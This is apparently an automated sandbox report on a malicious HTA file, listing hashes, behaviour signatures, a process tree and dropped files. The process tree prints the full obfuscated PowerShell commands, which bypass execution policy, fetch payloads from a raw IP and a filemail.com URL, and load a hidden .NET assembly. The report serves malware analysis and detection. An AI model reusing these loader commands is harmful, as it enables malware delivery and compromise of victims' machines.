Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
26-11-2024 08:16
Static task
static1
Behavioral task
behavioral1
Sample
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Resource
win10v2004-20241007-en
General
-
Target
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
-
Size
599KB
-
MD5
5a9dc05899d1a19be638824e5f47b88e
-
SHA1
418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
-
SHA256
741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
-
SHA512
0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e
-
SSDEEP
192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2448 POwersheLL.exE 6 2956 powershell.exe 7 2956 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2116 powershell.exe 2956 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2448 POwersheLL.exE 2828 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwersheLL.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2448 POwersheLL.exE 2828 powershell.exe 2116 powershell.exe 2956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2448 POwersheLL.exE Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2448 2380 mshta.exe 29 PID 2380 wrote to memory of 2448 2380 mshta.exe 29 PID 2380 wrote to memory of 2448 2380 mshta.exe 29 PID 2380 wrote to memory of 2448 2380 mshta.exe 29 PID 2448 wrote to memory of 2828 2448 POwersheLL.exE 31 PID 2448 wrote to memory of 2828 2448 POwersheLL.exE 31 PID 2448 wrote to memory of 2828 2448 POwersheLL.exE 31 PID 2448 wrote to memory of 2828 2448 POwersheLL.exE 31 PID 2448 wrote to memory of 2848 2448 POwersheLL.exE 32 PID 2448 wrote to memory of 2848 2448 POwersheLL.exE 32 PID 2448 wrote to memory of 2848 2448 POwersheLL.exE 32 PID 2448 wrote to memory of 2848 2448 POwersheLL.exE 32 PID 2848 wrote to memory of 2824 2848 csc.exe 33 PID 2848 wrote to memory of 2824 2848 csc.exe 33 PID 2848 wrote to memory of 2824 2848 csc.exe 33 PID 2848 wrote to memory of 2824 2848 csc.exe 33 PID 2448 wrote to memory of 1064 2448 POwersheLL.exE 35 PID 2448 wrote to memory of 1064 2448 POwersheLL.exE 35 PID 2448 wrote to memory of 1064 2448 POwersheLL.exE 35 PID 2448 wrote to memory of 1064 2448 POwersheLL.exE 35 PID 1064 wrote to memory of 2116 1064 WScript.exe 36 PID 1064 wrote to memory of 2116 1064 WScript.exe 36 PID 1064 wrote to memory of 2116 1064 WScript.exe 36 PID 1064 wrote to memory of 2116 1064 WScript.exe 36 PID 2116 wrote to memory of 2956 2116 powershell.exe 38 PID 2116 wrote to memory of 2956 2116 powershell.exe 38 PID 2116 wrote to memory of 2956 2116 powershell.exe 38 PID 2116 wrote to memory of 2956 2116 powershell.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WInDowSpoWeRShell\V1.0\POwersheLL.exE"C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kgyu_ypo.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D01.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D00.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b6ff50bc899448e5fc9f6ab94daae8a0
SHA10e3394303b18443eee720e5e4db7dd6b7bd4921a
SHA25600b455c025ac163d28df8ad81ad77c6e1ed9f642a70dd58a90228ac926f18a68
SHA512d4168a48d43d05da94e1d2a672d269321b3f425e9e1ffeffcf5a7ece9c90c8d1270a078fc553e163d120c1f2d4e8c7719595afc4141af4cd6c0aea7e10dece67
-
Filesize
3KB
MD53acd07792f9a5e096e3c0efa0ccb0e10
SHA11fa2a9c3a5a738965d9a3d9d928b0363f56e455b
SHA256886dd8d0623c723dc0f66cc532e59c5badfd7523447c318a219e006417f78ae6
SHA51291742b9145f1593ba445ffb9a9f77c5313e1c7e946488c52a2568b66671d2affd4ed669c85989ecd67487435387cd9c4507e825998a1e6e658b900d1880ffa03
-
Filesize
7KB
MD596c6e86856cdd3b39119c16477d08f7c
SHA16c12c4af4636e1c40f455502bc9cae163d1d35b2
SHA25610b83a7f450c7f001a3f4fa40d7d2fbdcc6c086b6633fa901bf7f06e3355fd04
SHA51224b6acf27d01737f2f1e6b75fc0902e38610fede69504d08f1531b1673c910a1ac97d13e7a2add08aea05b2e15237f3399787d5746b902199207567df242b65b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c164730ee74fe2995b201d188323a0e0
SHA14be61346214d7490a2f973441ab8f9e5771115b8
SHA25640ae60d59a255974c9b6a3ccd031b98b749304bf23360ddd0631ca210e3b42d2
SHA512e53da73323810b36d2e8e6a58651893ce1b28832997166abe0bb743768bc32ebf8fdbc33632ed0baf886548e88635073187fdb4dfd88dc67902626c9c28878dc
-
Filesize
162KB
MD58ba4e1dcc487bd110b4bcd41e7ee2ba5
SHA11881afff1eb946fdb3ee62133ca43d0bc136ac37
SHA2564bcb2f9b3a929bd940484218ef0a8c03842480a15bd8a3c4521f5097bd89d581
SHA512006b7dcfdb7ee27ca1e6aa536c2399321966ffc3b82bc0f86470614345b6e0a2a1ed1d7a143c500669fba375f9706cff8ed421502df7f12f49c3260dc5a8bde4
-
Filesize
652B
MD5b5cde83434f514ef36075d07ae860fbc
SHA1ddd2fd309a5618c95776c59cc4309b5786e57711
SHA256fad1f9d1b24b47383b06dfc4634f3794a608e247e56e2a9a5ee48d6800a85774
SHA5124875f3c9637546e1cb69b59f9373d07d3d82c2f87d1b51afad6d493934220c2e811416350adddd6cf6512822ce49abe84003231c66a4cb910e9b522eec26cf10
-
Filesize
488B
MD5df59540f8edd52a40245b77825076b5c
SHA1101a773a82eef36b277291d6e450d4984136b176
SHA256041ed2f3f184dd53c0b2bacbe7e55a05a747a3ed1aa2cab0e8c93e9ab25a121f
SHA512790e1139eab1d895386730743ea05b591820178b76fec615acab192ad8d2c5960703cebc2c6f4efc8158020506f35cb69ae6545c649e3d87b74845fbc2ec1990
-
Filesize
309B
MD5b6b82457c6072a30e95a541c380b0a0e
SHA198b9d494db0a74d3bcb549b5b0740daf5e3d50b3
SHA256a35a3da8d80ee0cf92bc7c049330546d8da6e600da054b13ab140e337baa826e
SHA5121046299f7a2270ef382e2de48e030f7e1b653224e70263893d8b44559178ced45862336f9fa241e3f381971bea3e62a2ab8d4725d8c676ba128d7900edd6d673